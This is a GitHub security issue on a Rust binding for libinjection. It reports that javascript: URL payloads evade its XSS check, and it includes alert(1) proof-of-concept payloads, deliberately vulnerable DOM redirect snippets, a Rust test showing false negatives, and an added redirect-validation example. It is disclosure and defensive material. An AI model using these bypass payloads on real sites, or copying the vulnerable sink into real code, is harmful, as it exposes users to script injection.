arvancloud / libinjection-rs

Rust bindings for libinjection
https://crates.io/crates/libinjection
Apache License 2.0

[SECURITY] Possible DOM Base XSS #2

Open raminfp opened 5 years ago

raminfp commented 5 years ago

Hi,

Methods to bypass libinjection-rs with DOM-based XSS

1- javascript:alert(eval("2*3"));

Scenario

PoC: http://example.com/?returnURL=javascript:alert(1);

```js
// getUrlParameter is a helper not shown in the report; it reads a query parameter.
var redirectUrl = getUrlParameter('returnURL');
// Sink: the attacker-controlled value is assigned straight to location.href,
// so a javascript: URL executes in the page.
window.parent.location.href = redirectUrl;
```

2- An `a` tag: when the user clicks it, the alert triggers :).

```html
<a href="javascript:alert(1);"> click me </a>
```

3- title value

```html
<img id="testz" title="javascript:alert(1)">
<script>
  document.location.href = window.testz.title;
</script>
```

Real example:

[image: DOM XSS]

Source image: https://twitter.com/Milad_Bahari/status/990539191544156160

Source

```toml
[dependencies]
json = "0.11.13"
libinjection = "0.1"
```

```rust
#[macro_use]
extern crate json;
extern crate libinjection;

use libinjection::xss;

fn main() {
    // JSON body carrying the javascript: URL as a value.
    let data = object!{
        "foo" => "javascript:alert(1);",
    };

    // libinjection::xss returns Option<bool>; unwrap() assumes the scan succeeded.
    let is_xss = xss("javascript:alert(1);").unwrap();
    let is_xss_2 = xss(&data.dump()).unwrap();
    let is_xss_3 = xss("<img id='testz' title='javascript:alert(1)'>").unwrap();

    println!("{}", data);
    println!("{}", is_xss); // false
    println!("{}", is_xss_2); // false
    println!("{}", is_xss_3); // false
}
```

Thanks,
Ramin - kernel security engineering
Best regards,
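An added example, not from the issue and not part of libinjection-rs: the report's `returnURL` sink assigns an attacker-controlled string to `location.href`, and `xss()` scans for HTML/attribute-context payloads rather than URL schemes, so the check belongs at the sink. The function names and the `https://example.com` page origin are assumptions; the inputs are constructed to mirror the payloads in the report, plus case and whitespace variants that a URL parser normalises.

```javascript
// Added example (not the project's code): validate a redirect target
// before it reaches window.location.href. Names are assumptions.

const ALLOWED_SCHEMES = new Set(["http:", "https:"]);

// Returns the normalised absolute URL when `value` is a safe, same-origin
// redirect target relative to `pageOrigin`, otherwise null.
function safeRedirectTarget(value, pageOrigin = "https://example.com") {
  if (typeof value !== "string") return null;
  let parsed;
  try {
    // Resolving against the page origin turns "/account" into an absolute
    // URL. The WHATWG parser strips leading whitespace and embedded
    // tabs/newlines and lower-cases the scheme, so a string-prefix check
    // would miss what this catches.
    parsed = new URL(value, pageOrigin);
  } catch (e) {
    return null;
  }
  if (!ALLOWED_SCHEMES.has(parsed.protocol)) return null;
  // Same-origin only: a protocol-relative "//other.example" would
  // otherwise become an open redirect.
  if (parsed.origin !== new URL(pageOrigin).origin) return null;
  return parsed.href;
}

// Replacement for the vulnerable sink in the report:
//   window.parent.location.href = getUrlParameter('returnURL');
function redirectTo(returnUrlParam, fallback = "/") {
  const target = safeRedirectTarget(returnUrlParam);
  // In a browser: window.parent.location.href = target || fallback;
  return target || fallback;
}

// Constructed inputs: the report's payloads plus parser-normalised variants.
const SAMPLES = [
  "javascript:alert(1);",
  "JaVaScRiPt:alert(eval(\"2*3\"));",
  " \tjava\nscript:alert(1)",
  "//other.example/",
  "/account?tab=1",
  "https://example.com/home",
];

// Returns [input, decision] pairs for the samples above.
function checkSamples() {
  return SAMPLES.map((s) => [s, redirectTo(s)]);
}
```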

yaa110 commented 5 years ago

Thank you for the report. Please note that this repository only provides bindings to libinjection.